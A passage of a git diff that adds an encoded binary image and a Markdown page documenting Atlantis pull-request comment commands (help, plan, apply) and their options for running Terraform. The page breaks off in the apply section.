zK|^63Q~*4P5w&CQ{xf~D^n?BF0$G_mjDL~y$Qsb#=6}$@js%ns-)K9{IBN_CJN>47 z74H7n155Kcv~n0AxWYn<7sx(Fm+kWy{Xc86K_v4t(n7nJl*qz-Zz#g7 zW6}IkN{!v)P+8x`P3iui2f6mxhB3C0zc%Z=CR@CTds8NIc5r6(B!2BWWSgoV{67YI z4&jSSLF#a43**IpqnY+5Wdcf`wFK%})mx&@iHZy!7H%+fbHZhP2l@75e9U4CwczX^ zOyy^Dy_Aqp=D2SaW9lo0>fim1OB0I1!4lv-pk&_w(~kKoGpxZk%n|t(>}WiUfBAh+ zp(Q1U$X6I%FT~5OsXW_+aDdzC1q9-5z!s#p^Mz^7((~pX1fkoj@fqzZO<&U*|7kzMY!w z+C6L#03=%ux0A(knsc39hl)M2V-O5O2O5QJkzzZC;NRxmL98C z)i=17&1K>(?|7`O6nh6mUkc*&3&XL zAB0^E0IA?YY6O%m47&9U(7Cx`O>i`Ujr#PQy65MIf<%ehi2hW}9pqkSY2-iz?KO{7 zZ_1EI_k@hmwe2d8&{f^*#5WwrWk=Y7JDt0-oEkEw+nwl!rg1_+y-#517JnTat~PBA zGp+UQoA81Dax$o*ZR%knH||E=#{wvZ{m2;`#mbr+4k}5lTUQ=8;Bzdnk7cCQ&#IpO zorKD{vF5A7mkWZvG9&Mz8)Pdoa;a`aB?IE7db-=7`}z_ zNc*0)l8j5Lq-ZUxQ@iqGb=%jU`WX*f!j?Zlty?8p5waw07z1E)9>dmTTYY&`r_jS1 zkW0;jGCOFFY<6f28E0pOOYrF-29BJbO4P~PhHyg1R#Ja>1&0FYDR$stn=vwHYEF() zC`b)#8Y|geqb}bljGPz@wuH)e4RBX}G5VhSg+SiQ?O72Eu13UQIy}kxf{ZTze&K;^ zVIdMOxmHLkYA@iJP}CEbw+%^8wC)-sTQi3QQF|aU>$27?PzhmfWxg3-qnaBX(Hgl+ z57aiq1$bZpUr2(?t7|tR2rh%SmygQ^Iw&ZYjY{naZJbw3U+H?*(l@KwQos3lZ@%Pj z>39|uJD4Oqy{KZq^-k^U@DxiB9xejLepwjb!+h$tE~6&u4r_Nh%h~{? z#fM8;wTPn&Iyvt|-5M>4WLsa@@#8{)#zId)3PIfE@E>dGzx_ks!{7FtvtZ|f<)R1x z@Xos`xoz}rU)#}v(yr8TmpWWQ)qRKM)1AL53hK*N zu?>9+XG*kNArSn#Mnl0*>s$`s!r~4dht=l7K z;u!5~3c46Tj<_rbgfKJo%v6~_BA+mJOt;Ul$p!lv~HFX<-F72TiLuGaeV z&c}-H+}?Koj-nza0EbxOj~M8D`1X1ysz9^E-ZYnC$oZDameMH2~iU2>e^%qm=+2LqI6 znistB$K-=l;~3PwiyY;&2w2#@_AJv8jJOk3|`Om*9{>S#`3ZDVztmjv$qjVcT0xdM>Q?Q zSG(++ObigPM z!&xMM!8%b?BS-%q0EQt3Gh{GBy$G3A5~u(rPa~P5D@I~YeZG*9J1{bAOaM8@T3oI? z&1qh58HTNd(|yBJn}MC9cXRoh-~Bri+}FxW6PSmA{w-V8_S_6pzI@Avl&dFyV50j7|JmtBc?u zel6GV*lwsPGIkb1##wrA-5xIdKC&ZU#xk$nyD3ZdrpHO1Ub?W5?R|qz{;}tQ>4D|zbTL)M%$+7}jS~j7TUntz%J$ulT0;BL7vx0$ zQB>SJSCZ`!^+;e3O7S%QfC#&vhUV|mVOm;j;c&qoaXIet*A!%1#r$5KJ;S2#SOC)8JAV%HVuT^`riw-U3`m`vy5 zwuz+t!Ge$Wb~quRa5q0|)dOv^2Q`#t8+X+AuiZ$F&WhjBnqOjS%fJ2#<2}T?*qatL z2;x3qCFa>e35#n(L{vtAMSj~9qLx*5I971+U94BiPVyb`e>zKyPit`u?m#Ua%!aDun%q-{`2FiHGy|r>@}Pwu@B^IlU)@ z_+4RV5f0bo*#ABo{>Qf2;3H@~RTodToCB3K1A#~c0udT^=*xkSV&-|Ii5wZ+m33ht z+*E&N!$3YTIdy^Wkfo_v5zqOD>t*VyUX`F{-p)J65sk%>`!eSl3P|Uw5zYxye?R5X ztK*`tx7WXDolX+2l2d$rt{8HoM`p4g^oI4EaWeJdMoWgJOJ;4{zb5(2V6Q}6Sk;_kaA`ZUogf$e&azf|!0=SIo5|%B9AX?VzJ*=8sZP}S>O@0JGU)ep>?lPlxOM%oV2)w z^|5KuBh>Z>@Ac{2#G}BiXSVx~o^k}coY{UCZzou>>WW`^4oH888{;$GF^Pco zKBPEEpQA?s-?cFu*%j;Q9F_%)IiLM8K__QwIf_Z9&fwjgP`OLVV zxO%Vc+@bi~kv$y1yd3ZK5xmb4-I2al&jQjMvzl2bDZwIj?V&!`VP+=L-DIM9lR@rc&Pt8fay znJ^$;zG>v{Z3%s89#-yf&Bn=KCIZW+FJB?IXxRKUZJ+bK^jKX*Yw+1KqH~XYkYg2#!vM1R`?f zpI+uTZ)OX^$RoU^o04b@;^ji;{kT4Z$#=no@yQcrfb&b`#C)tm(r|^TB}C0Fgfs<+ z`U(`v)ksk1eF+Qw2nL2Gl!1bVphD$G_$!+fbpqQx*+F_g5$NuG(z-YPsqXHWz@pK4 zdoXcjP1`6ReNTh0j&jGosA!MsvJa0v)PbEi<577+d^VsLJUccc~u5gtXnr-UY z%yL#YBJT$jhxgZ*Q-<9Ix7EnbYR5tLV@fyD@J!y>??eTav2^Ba2HgdXEA%PQxhF^h zgj@e$0P2YNKsn|O<7N;bgGT(*v_AbS2Fjq{&o8~2D1>n#z&+Dehc^@P2LgV%r35wV-L3CPU9>{s4@CxN%mv8keyquV%M3MpCIxkL}mJ{@aPLMD;& z*c|XDG2Wor;frni)|z+x`5fKqV)i)D5yeC1M_uJ919Uc8b#y@Dh$zFn2iAdcX~%m? zG5i(Xamb;YJb1<%L{E~n68hQQvx%^XxC46XK4YM|g*Ux*oN9q7B2ng^6jok2`={Ze z-Y|Cd;?v6~o!su!hkQHfPb@Ea7~IF~PGBmsQ`Vkcpg`d@`!DY2cpi&rd6$bmlr1-~A?oc94~8jFuaYz$~!4H?Y$^kRnW*G!l%IJQCF{(%kV z{pIvmpNr`s$?jLvuH2J%UoVbh(_)v-hhnG%{K-~4hQQdWs9G8hJ)ww596ukH9k4ak zgS&f8C?f44K7yhZ{BL%{Oox>&zu&{ZOs9zK9e-#rQhS#Woeo1}`3+yDeGpbKCPTY7 z)c<)S>FwFJ;(dP&a3uDZiyk0FA9{Zz-~YSqu)6Oe0w4v1Z%NE)>Y+6hBuNfahU)1i zN2hfXVtK%d90FC`-?{g{cVj2cK&nCEH43@aGwAgzu^_MtqJci%?}i+1n&bk~+B zucn)`6f;$xIZN_`{ER4{9OwPrO#crRkN;W#{(Y2^aRmb3#51o3GY}*Va-aDvV@2#t zpP%lRdz1RQRxD0h*Fjo>PNCJ3nRAgcZEjGa=Zx|m?J)7s&Wg}K9gD#P{93Fzyx$~J zQORNG%{DX$wN$dafBO_hX+48va%4umE4Y31neL-6`v79RskozJ18oCTvB3N*amOkCTt8? zsbsQexF(Ox&wc1}MAyWy=wQ`okdJe=#f+~5AO0>>Ufha<*Y5t)1l4pHQF+Uyc9lMf z7y$>vxczY}nVy;uI6Vavw&Tp@peC#Dttzko)q1>c`{^5<+};l(@urXZ1K}=}%3*Xk zo{@K_e>efrNCrVQ{Yk=I{x@;M3h-EL)&>^4Z%@Ng;OY@!;ci9K0q|2>xwog`iVfH0 zVYApMK94;Mr;9lh35p|JG>`-RRbU0Ld8*{a`NLGhjMF z|6DoBet1yyE~CQb{qSd~K}8RI?rm4Lymwb0BpsslH|#eijmasvBZ}H0e^poI-FE5! z+}Maod!}xJ94z1SU^gmx)L`!F3cRyHfC<=s4hXssm2c3)C<5P(nRJKQ&VS#LKTx-t zV-f77&lqzc&Xi+??s6l(Zqt%}LUmrE8F^iG&1tz$r_1TamNJO6m@Rh`&uH ze4e*%*PW8xR^O>=Qe;~?=i+|S=+75#4s|QMOd%{Y)!;h3nHLOUG-ILhj<~A&^+@Bq z36VaHzD(%4Evt|3%vH#`guVfXA@q6W50W+bRME6;x=zvOhm%;I zkHcc`K{mPeq|6>R( z9{_17NcJl!=$S-~HvE-A{2o{rpAR7sRDo8N6PRDXyyq?IpV}h>eeSX!iCPHHFA(PN zc}VEB;l1(AK_V0r3$v0c5kVp)Rq>YB{QDe!|D%{CsJY4G7b8<{eu3%=d&Sqk#`h&1 zG~escNC8A-LNSvNd_&|{VR_@5hX(pw!}{0=90K+c`&GJ|us^id6$|>D>q;bSGLVo+m?O!E_%-tQ@F~E6&=qF=q(TCNf>PX8K=V4y za_T_Mnca9-*Q60%tWS191R#chkk3m|vjf3g(Lc59npVBasT# zuf<}*B9V5%{1|v0lsDiEAnt{LQO1{O`w(V25%By;8tdX9&ZoJN2=5C30K|CGOs|uQ zkOIWLZ&^4Wijg5;L#K2n(O=gM1x-+MwGVCT8nS><>cho9snG0i74rO=Ehh+S7duN- z{dHLQGE5<1P?DyTn-kyggSSEbNfztBIUu9^QCb=nXh#iT< z#A2fI5?`MP02RbN@v+FzDHy+iu6;VQKUk_l8j$MFKdn%g-ay0JUy!j5JpGZ+K73D* zDTHh5>j&SBUOdNl67MledJ|2joF+H8WW*VM)9%0~=?@*j{_bdWDLx?%)KPd;N@@aP z#`NoB_u+$sW#jM2czF!Nf~A<;8Cq8I3otqXr+igwK{`JPqDtnnQp&6vXws1%`yBtI zLbD*scP%Gy27o9Z;CqVlI`fc1^g(lBJ5Dhu#pV~Nx~4u7cvXdb4NyTE*`pJA!GcWM z~MoS(G zUF|{U{?J(?@^!-(N&&(=;pxX{?I$s@-Q(=@*YO5?{cV@0*Um<@Kz4Z-a{mv#!c5A7 z#^)uIG8OV0=a9bKKjDn|8)wXfff*1$1*RRGulMW2*8(zpUFIXCwm^_cXs|cMeqGr} zQ$fl$?r8eR8bV0){1AfuC*|-08PGO}Xz5QNcnl^NVg4XrlL}CK{;-WdmqGm>mSXPw z5oa<`L!gqW?#6xr-;dm|qh7}umK=n$PwJ0dWf0Dn_&Lw7&ley8f~|0J!FF5)M6W%V zBH!1WgPHuz1AMWR@rK_xAIwdv4v5LBY9t*-KbZt&H#KRv7v*xhUw`ggYW(;rVuhe_ z1Kd294{1J$nOxJ(=EJcy`mzcY==yxwc%rPYe2#3+u^z}lyjIhqJvxtksh5a9*OY*+ z`}S@)=3Pbak82&z3s^F_SxY@XdxCebvpVFrP!25`?NC9=LQZe{>|_+g^da*YDYM_t zuiRNIJS?|V*?p$KDRKO#$6f`CLS7)8Bc4oxTy1h9tRwpw`>P}WmqT&`T1@oPXOn8> znrMu_$LP3+tPUcO&wc{lq)v{CgAb?5Jo!#?mLFrm4VMIP4{M0xzK%K42hiveD(uGQ zLH5^dB6MVAKPgg9fdbf|GH(<;_Kpm9*JJ=gc`o6_xvopzGpdDp4?{ag%RR!0o{A_5 z;pA0jjI#Zf%f>I|YXQ(G=_=MYCrbt+LYQrhh&+s{k(MjfVb+4HSNMa`6?QBNJ5&hF z4C7}lcQ|9AQ|R?vLzPUUuh?bk=U{ZF>ec zmjn`4CS;Xb|FRGgHYN(+($aprVhX^rAQgakl@f{MHN=BX$~J%}JfG)FNTd}$^C~Q# z(?GJ@P`Ar<11Z4d2g)cJ`1dILaLD_bSJNz#nYmAM3TremhVA}Lnnd$LfhKyOU-^Iy z!n82f=<>;FjT*AmalE39`_6_pBhcttiuwbKSv0PJ>=l9X{cG9F{y%3UbVjzrKftdv za{%ipBiG^4Ydnh5v=80AL_asPb3qJxXV$3ysD(zSRA9z?JHj>@o4GBvv`BS0Hn2uWGQo6u7P# zdFD4YDJ8ekjMp8-^`9$os@`dH6g!%mTUSp#;Le2TwqdLZKs49Gi!SrZGvI3{eL zQ@iWy_)?p?6<&5oSv!o-s%qxzSB=qufeuBzY~fA_HCTxU+fc__VXf@6kx)B2_6{sI~v-|St@kAu4b znNjZayZPxS6&kOzukdK=n>Ir~LQqq_mnUSm3gX);UrPa74O*I}y4NXV0J3eKnyO1T zLErJ%-;h_g;oRYI9!ySnWidfN7xYlajvF#Do9!#ePK@9_`2<}>CgVrX<4vLA)Y?p2 z3~5wp#9S+!%+{ut;o2s8)wEfLbo||TiBo~BPK`EB8zPBV$VzLd3X?Zr6(Q`A+3!Y3*n+iIYG%!9r(+Z zPd^hGe_RP4H>{?Cxoz-595~7al@KYaHunHt+EcwG)O!d(zzV}V4rq^H=+ zLcYXQ<_7n=6m^*482wmO70V3|t=$RUd&dK?kac!Pw|A5*g9y34mdqKfu z^@)So*vkoDU|hU%p>;gXB-4p!UTJ%e*(LD3DW9nKhU?#Us=fxG?V4ELvJ{{WiPWWS z$bILVxZ99l06eu=L;cH@E#4e&CRi~ zZx)ou4Yw_;YADC`N3n}f&DE)Q@Zb;EXO(jd8nMnU!&Sndq*yQA)LJizavZxIksuyn zTR!utiH#mu(Ine@&06?Z*zYrt5H+xP)0m%%7L^=uzc3TisG@R}%8|J1<^;B~x~=f2 zjv!X<5g@WX-qf;_GXHom{b`uoQosqrcGDw{JrCSQ5f%1MFXc4y##MtdIX!J=wgX55 zD?7D$mi-}|wU4Z8t#F;A-FAXwt)~z4kEh}5JQD3U@wf$|Us~&LAbJ0`?;$J%S?_N} zoFB3o3h_zV^bekq+E?^t5^T}~Vb9z^t}fid$!a9xnE5Wkp>sW5E@$*`GGhC-uTB}VXkpi6nl+PamA?O?}?cx=6b zV7)c-Zc*ys2i+L!f?<20-qy|Z+0y)Ov+~QN`^BOke3|tR zYlXY(-20`t_mmaP-5Hu!|?JqL)KBu7_ z9DJmz(d#slO^C7oqUw0EB6*}aNqtbL^qoL=q($2rIK9!V%!}#x z?Fe;5&7fBj$I$a%&C=nJQj0UM7Apf!xDM+S9Su&6csooogl?Qonrb75@!MbAh2{ zeU04;NM1#82V9OrRS#Qu4h2nkt_AZ#yPR|dwbm16rT6RRXc+DfoF_kr_njPMYwIIR z*#GLDhhTub375T4)FM$zXxJD52=5sTEv}W9&&T*oOpIoSkrk|QCG&ScjTRnJtQ9oK zu-bmJ+>&WarSpvoCCAZd@Donid369F75V&!afY2gRe}xA)k&OO?E)~>-lWmfUAX|~ zQ1k8?AIsz6W#1Umd9TN{6-<0?y92VWvEpI9j&w8-^nkl@UmM|^WfVQ(9KfBzBlS4z zLDl9mQn^LbD(5sAjIF*r*jNmwjyo91PsuoYHgjqdbAETPaPvIYhUH(}zzsYfi+6Z3 zT~?V~I>g!0vqWq;p{p{FLri;#?s*vk{Ui%?d+%el^%T2u4p%mYC=X{V%`)?(y?E@{4G$LevOizulx5~hz+c_#GhGVkZC+ntvngfM5|ntR z*Q2>{>Ja^9i#Lh{Vn)!eyi+=a0<%~FjZj1R3u0Z@*xtkD9BQCbzM;uJ>s8yt@RDW? z&@9#IkhaQN*}Isa6)4iEX<qQRkzc(Gu3WTu*p1$ zS+Qj)Ta>#N)JJ$Uh_oLzpKjOg2=*3#TD(!^8*Arrj@;nf>Kx!uby=KuN-{*gf<m8S4gNx>*aN z8|20kheVoQ2bF-Wghj)rk$NvSZPk%;=XI~9?d#;J6Tq}Dmgw_E7Ecob$2CDFED4Pd z9IqK?{y7ylms{8)vrX9j0@^v}Joxw zi5cnmTkt%GgX3}b%x3G*%L2o)51bnhnmee7xbf%U$uS!cYW8as*+b#B9&X5<|?XdG$4$4n%+h7SD$_8 z_tx3sve11)2>}I#UC72uF}$DY^Nf0L9)9nfs7V!jxy*dr<_!S>hPvjXs&rRpf^+ZDO58RG*Jx0=T!&_B0eXl$qm@XAo@9* z%{B0MG_&4JD0^S5Ox8Er_3=8ct;V!tL9@U-2O|1GM<2QAUrTDJ>g41TB;#mdi{V-P zv}>>&Zc(S*jGD-j2dOvd`c=kIl`Eay@UALrIBs2<$)T1~=3 zf@%=}+yb;`>=AJ?4m~sRpO5$~=@N?FjcMVqP>*b@1K)O90O}2LpC5aLRjR%B$9TO^ z8=5&%G7icxO%5b1Rdy8VresqB&n-m+Y6vqumXi0~hiAXs9q;U&aRwE?WZqHgG>UyF zYf**=&#nqKpYGUk(6Tzcbn#NrL_$(HSr2S7JG@x--MSwH{mkx_=3(;Pv-L>2-5Si( zW6rXfvHoK2LE9)5lhJPJi<@Xl^*e&1d@Jn3X6+%u%!!!%gZ%;TEE!kz`6jbUBPl1( z=I4xwtIbr5S#ZTGwhpM?R201TC;3GA?^WtM-&Z%yoy0kR=RWT?gNJ?mXvS`Q=09U< zmRUbEd@dsx^de*YZoddUu5NLL)Bft$fTZVup*WDXMVK{pqT7Ay%KBi&dH7<5|ETHR zc*2VA<{9}@9bfrilHreG4Y^_4gr1QGkyNgc8ME^cSdD#GD=J|;112sJ-2%aLdnJv> zIGsce=27VW!$Q%#$m!=+`*>d4>Yk?s&OoA*(^zJw9DClKP82jQ%WA3T%6a!Zny1f0 z^_LUVhUk-0SKXv@!FxS8bgC!*sckSUo%(ZHk=1jk!%~RJ<5@UlJUPq9q2y^dcYob> z{Quy&uM#{83O9(cro7KQg6ST*H{~Z$MTnHM&!R_VWmS#~lHXI8CFT-KzpLw%9;Yi6 zG}s5RIMp(TcZd?&+aE48sB<)!`Sd%X7qUH3;T$fPPP0Sr73_z9Pn>4lABr}o!&_-Z z_76A**BzdL(f4vw9fSjnheL-jv?W6i}z{~W>I{W5>fc?T==W0Y}RviX2U zoWrQ2;)(bup`KsR6{1%%_vjbR_?MxF9+P2j;7J23VHCE|Z2gHbFW1Nio-GGXQ4%_K zVjFf)zJt><%u4-5wI#hm_uUQN%x*N5tQIQ8gGZMR%jT#tatraVEqq3X(xp4QT`Kc%)7p^L?X{o{MBWZE~r+ zBJXvpP3?g$$Ya)jIYZnhV4viA%nW}iGjv-vvVELl4d2j8)~25{!mxO=6mc8qVf8o?0ZmowTo(lq*@O&CYXGgr@r`o<8Ff z`)XAM!av5TrB12U6%@?$?OVV6WO21hcMotoW*>o~B+<HNOVdN&wX&;O1YYCkpBJgs`L!)MjT{TC#V z?l8WujeelGGYS?8ji?%{qYTHC4tfE>t%rhaPyVG!6lgV7#a`wrXsA)IwoqlA45k3CHsX>$Dst$Ff!)|sW9 z!~9D0#Y+UN-6)6pRrlPw>zBzwy4?$uha>xE{&0uQ>&aP$>`8m?8Pq^1&^GtN67aM& zmBuNojot@!8sB!|8%8zo-G22A-o(ut&bCqTc=6UPz`WU^{`(^10I=JzE6977F%ji$ zgW~w1irEz|^jQQLYfM0?xdqfuh8UwaB_1+uX}i)W7Z#0qz1#!L%KOp_tnCx5D*o*l zQR5-i?(=P`wD7W$0^TLARxQUa&Z#>?QKD((3^OTZ*N)#|f#BtTV}u5X5qVeJR-XX7 z{C-S7SpK<#_c$;XJ)SmzMNXOKZsh0$_xp7;`TvT$&Zwrgb*q3Pf`D*@L$`n^3hJRs z=qN=bs0c_G5vd^v#0VjTCPk%K0BNC_gx-4~1jFq+5nqS##eQVCW8);%IlgepgAblbnpABO)oGk>8-o6>nkuB-kn{zv-Thae} zF-uNyQCHPm)SVVBBUm|-yS!J!TA;yDeAS9%@8zk%OIj^(cWlEc? z8DBUq77U)`7Jz%Wc%-WSDsmb!wmPbUmsUGY*$IRt>YG>VkPW@CXI|YFGpW7(?Y4}* zHT4Cx(Bg{H_SG`?2jADe=2Q+8p3Cws4q(_F8t?@FKA+$|MC-xw`nL;6ZO(mwk$#A# z!NV;`gMC|Ehyd18!wu+Lk3@+(&#jdfpAYp_ti2cN^VEj3-y?_AupttV#m*I%Uh2ZP zf>r%Odr`D`2ME64K0yX*Wc)m&t@CnMe*p(_eKEIMN2t68Da0#$i%$;D$kf%IUMY?F z_KGq^)G6NlK!+@#P$OX5)fh?X@vtEG@w)X5{7qhV;j4-Ee2UkG7RukE8hxg3n=3o{ zPn!atwRVqke<$c`9kq3Eu!Vwqlv=K@XeRsxpiJV5ygCpsLRJteqi2OL{oJ}hNDa(a!H(;Qq@6(ZIg`MX;R zgQ6wi@Ht$F)lyD)+Gof_Z}O{ocxSQ=$Oc0_&Uay?^_i&qB}n?ny5;R}U<170g28-Y z-wpC3ShiAnqffk~(gv+U`auMH4V#~NWm6JoZ_3jkMMvuvM&##LyCQECVBtlLDEwpZ z?<%#ph@G^ZcymYP-oDz3JIp(U$G5+oR}3_(T_=0K8F&s>_h+d5k+H=#Q+4AS!uHdx zjKUR*pcSc=*?jrYmlyM<5(nKCT-L=}$b_#F@n4O~?Z;kt`X5~b;L6uCryU&v|+WGz$_ ztO(d%{1&^V51YPH;{GtSv+Z(xb{)<NXeWbE;qCHnNINw)0zmQ*yQ-vEc2s&gJRl z#V_h>UsEe?4R_+rm4vl6`(;klTq{$}`w&(9z17ege1)KM-st9FqzMJH5w~=b=gSK= zAI&((y+k*$gR#;dx?3_+H z>|=FT|}B%+?bZ_HgS z>Dl6e%qBz}{k0XYk1V~kuVyjWs+%Mfzhv=HwST}@VG}eK~-ccMnsZ+LV!+8t7lwK;oQONu8 z^JlnndU2?@Or~q%CwU$VcoEHXYm+j`bDKyKD_wi_v-gnhO8D=<$|{i7ququ!-VG?< zt&$7mq+hUUX?2*E#Y{0hLRjj4MBeNQ9Rc+vz4Iu^qxUGf;`Z)O3$9CdBCfl9ylCcq zt8F~ea%R1&XEhr+ZXss3w}jX^?xC zMGnPL?TMM(v_cW~OLKk8;JVD;Ec?!EeKqzdNDsjhhC;r#PI1JSRF_N%jO0(e<850F zWEz-l7YPq+eYBMLDY%7ai@cyvledmIGw+I88QQU5@|ePgHhbCR6cOU&i&`DhTf-8H zw}##PMWvSu!Px~;pLM8#maq}3{CGSc-M|lJs3aF2Tnd!iR#na8hkUm9 zJ18-@gw!qK&R+KPn-1@F;W8e#hNOC8i5%iB7ejAp?7Nmq#{5(ksmkNSanCgBjVh20 ze{>wFEo^AVHwnHjv(GOb5s8KPFF`$y|1?+iL)@b!t*lLhI@0PMRydVt=$e{j6C*rIoeU8?FL%nb*d=baz|%3bbl}%h9Dg^c$Ovsu0N|BeYdXiU-sd$wm9?c9(y^WFac`jo`^Y z`Xe+gyUlTw9CM)FkPFiLrR;8S<+y6Sh|GoLvo3E|R$D8r`$UP|EPP9=Z$I=Ggx6P= z0=0`A1J6c{wjG6%J0=T7?S_^6JxtMq zI{MhqhoI?5$j6Jn9XmqVlv=Y~-%a3UnAKnn}wZ0%~pT0Px?i~L) z@kPh`O6ccyUh0xKX;9)(``{LGtEaAHU5@HG;(6bw1KVBtb{(=5Kd8@%3+rba{+2cT zq%x|M_LnqeR8u-Bl~9Te)h~u|32zbxp!oTU_0RNP(o;wGNA%Pl=}>UvV~t}9BNKS~ zHZx~ENQOs^0jGPVB$E6S!&e{2&7BJ+A(A|c+)y?s%M61oZCrf1D19LdxRb1dzE^4& zZN7nRv-p#*>VD8q3YBW)i0S~9tae^9_57}gUsQJMloOA85rs5W_Kdh!@bvX@vl}gz z^;CSa|MChb?d4>2@**ggS5fOy5hhgP3V1dZBKrk(uMOv>p)y+Rgtq(C?Js$hRVh zx>q9BVo2_bSy_#_roI&4DXi)TgeK)}G5F1c#MoHtFff@ZwQaieexG)4IGcyNi;t zYeZn8TUCL0*3M>v2ZbC>pvS0F&R-448!>So%zNXWw-aXIeCb3rG#JyyQeGD&TQDd! z`jt{g0&NEGJS?{<=4wyGm7d%Y_!;Yw92%=c@)lo}mE5=03) zbS5cIFEOGFj~@e$Mmov)UgVa`kco4g^4s0Vp(|1gVdLK(0-knlapW8U>v?>KyY^-NJdRz)@tiOV zK4&^8Aq&AAk3u^Nw%456TK{p87G&6u(48KR9XRDZRckmheKk?hj9b}^y&&3GUp|lJ z-7(-*fy}-eilz7*BaOr?f^rdsN}j1LCU@C4jST`raXSTe8pTF0x`i&1+xF6}o_+hpRT*6h;hZJn zFLtll8@`Mf>qY#YKuFCi+Z0DF_M!qB!{-DZB)m3&k{f@o6ctDD;V|9*CQ{W6=&{$9)CtD>(bCI_MI`AfZnk-? zH-A}nH@Nu`8!e2Mu!2ats43JsrZ%{jEFqqNtg+Ro_xnLhCAO`KTmA8ph$6kH1|d>% zyf~ZY|2hh5fg>1}Gs`c-Hy*X(-b3^vQrNay5lkI7QyEDYX>UU= zO?x>MGBzr2XPuN`v}I?hnHS;PgbzJRBbZU8SZW4F*#@tdo3#)T+8d+FKbonFd|q=m zW@IbYu`RGC10{8`oMXnb(;fD!A8(^$cPB`{O9l(zUl%Ec)ld4&LjR;~e4lKo>0bF@ zI~&@!u8R=$)pi2|^>t^q5tpy`&UARI=y}@^A1_|Nr{83r(vQx3IP{o061)CtWquo6 z@hjwp{MD8fU$Q1ECo#&nuOiVi(z$v!U3{uSJGw=T#NV*L)3{&8n$8x)V`v^U8B4M09Q3NJ3BVOm}Z}hdr;-G94_# zYSPTAkn3(@vM9~?k2J@mcJr`q%vXu~i_S9D=jPHLStfBmQ_3x+-{H>6?CB?(DLqsK z1&-vorjEwlH0{`S3l&33>>_L?ckk7f&v7K+qeVjN(>(Uw zQskRhiA)j1k?;@{zLoINr_D}&xqt&QWSGv+=a$p@!vHj`&Cied=D0SG8feb2)!`fb zj(V1}Tq%$N7I0+E(9CeQ|E&>c9g&^YoY35?tdhM^V2mNpj~bUZ=P%pbgcPGJ6xI1N zUGDz|PfproWZi9^#n*Ay-^##{tDFCV03{e>kMfd+UhrgZX*;-le7^a|j}oe}^3eOI zu+riOrt=mBe-$7uLu<=s;n64dZ+ae>0VRiTsH3r|TR#92S0F$T04Nj{0C%EdETSjQ zUmCmN?icWS1mWJ8H97RlE3=e|RqrkPi8EC{)yEVoYdOuTyzSw|dFiLM`Glo>B})$^ z^(RRHJFAL-&8n_r?{8?iM7(z5>;&KZQO@#;Q&_Iav8B{*Jcz8=5l3wb^_M64p{X7j zsu7*T)pa}j_h@_Fzc&WP9D|Sr6QZ(I)#6=c?-XyV)(e_8Q46?h`b|tzus6dcO76DD zp9>o7)*hV<2RPV;vSqUS&z*qsi%J2&5fetRHCa(laE#~alhWQRYq@|4d8ul(FBdZ9 z?=-Cc;)dw=(-ZKGM{E4g)?KUnuj8wKRdGVE0cTj7ShIXqV5agu<4e}?h_Q!@*RIqK zs58Hg#b9L<@!HccsE{kvFMyrZ;y~(lXByzdq0K+OkuCs)Y$431yr_a!T8T*5Me(5| zBS=R8R>Auj;=Gyik_u)kN@|%H_kS4Bucfnf=}+{7n7V+tkYHd6qhmY(kRx>Yz)C4N z^omjTZGaHU6)(4QN%BH<hsG?)J^B;67kiU z@}Qx{X5;(0d58|d`9aRiKQE9VTL+V&KkmsBVsgR~1382n^epFebyM2zELmEIw}C&E zj_>icJf+>eRVvI^D^vww-r?(a*a&QODCOy{nA3Gm45cSJ4)QN{J1@Y9jk1%kVF1yt z_vjxuA<(Za9vR7VUa7y9NKr=fU4GJpwO-}g9(f|mtBNV+&1re}5}p%A{8ajcms+O9 zt?uIiGeMl^M2|(awS2vRo*z@KBos=r_Rkw*O*M~+)V=PP1+_diI zadVTBnum$d;q-d(%A#zqQe3)+xMVM^)=-}0Tj@N{0rnZodRo+^ z#&8&Qwt9~`8(OaZ3Hbi=#I*w_u5!dzjtemVuXgSJjMKuxjvd_+2a`m#GysU6&h^Pb zIe`#_v-hbVXrZGFW`Ijeu%Kl^fy?&Dxp5!dol4S;J+i6#JIA@mBdYZl&!7KwpmUx$ z+nKeO=$jK`Wkt2L+Pran`-`amj;x4JK(mlRD3iIPUqHZul34hE@#X&Y$IE-9xhDdG zY;7W1!9f;DtOs`o$Pj?>k)|7rLjkjO27fX;d9YR4gY$ujzV$8l(ggsDy;yaa-l!oH zXjipfSFXzYG^#J^XxD&4?3R@gkc5#VNI}|1o#NUOTfFI<7{q&z>u%M)x0rv+EwtMyQLo9D#eu@b(X;`<7z+ z))@cUV|*^~;S@GA^GfKRtJR|@^rZa(2vVd-XUZS_t>)@Jaj=_fodyQ`$L!2Y2duKz zBS2XAGJ^|tm@?caF(?KThg zM3KkjZ;r-lMX*B^)sTn9#SC!OF36^^2Jn5uZ}L#x91C#WCqB(0jzGMnjRfsqPyN%q z@5?m=Y2pJy5y92iv9o~&^fAFOoq?FG`Z*8DCss-II> ziWww(aI>Qf>;Kj;TwZSbuewa0${ E1A--qssI20 literal 0 HcmV?d00001 diff --git a/runatlantis.io/docs/pull-request-commands.md b/runatlantis.io/docs/pull-request-commands.md new file mode 100644 index 0000000000..1aed3d0c01 --- /dev/null +++ b/runatlantis.io/docs/pull-request-commands.md @@ -0,0 +1,39 @@ +# Pull Request Commands +Atlantis currently supports three commands that can be run via pull request comments (or merge request comments on GitLab): + +![Help Command](./images/pr-comment-help.png) +## `atlantis help` +View help + +--- +![Plan Command](./images/pr-comment-plan.png) +## `atlantis plan [options] -- [terraform plan flags]` +Runs `terraform plan` for the changes in this pull request. + +Options: +* `-d directory` Which directory to run plan in relative to root of repo. Use `.` for root. If not specified, will attempt to run plan for all Terraform projects we think were modified in this changeset. +* `-w workspace` Switch to this [Terraform workspace](https://www.terraform.io/docs/state/workspaces.html) before planning. Defaults to `default`. If not using Terraform workspaces you can ignore this. +* `--verbose` Append Atlantis log to comment. + +Additional Terraform flags: + +If you need to run `terraform plan` with additional arguments, like `-target=resource` or `-var 'foo-bar'` +you can append them to the end of the comment after `--`, ex. +``` +atlantis plan -d dir -- -var 'foo=bar' +``` +If you always need to append a certain flag, see [Project-Specific Customization](#project-specific-customization). + +--- +![Apply Command](./images/pr-comment-apply.png) +## `atlantis apply [options] -- [terraform apply flags]` +Runs `terraform apply` for the plans that match the directory and workspace. + +Options: +* `-d directory` Apply the plan for this directory, relative to root of repo. Use `.` for root. If not specified, will run apply against all plans created for this workspace. +* `-w workspace` Apply the plan for this [Terraform workspace](https://www.terraform.io/images/state/workspaces.html). Defaults to `default`. If not using Terraform workspaces you can ignore this. +* `--verbose` Append Atlantis log to comment. + +Additional Terraform flags: + 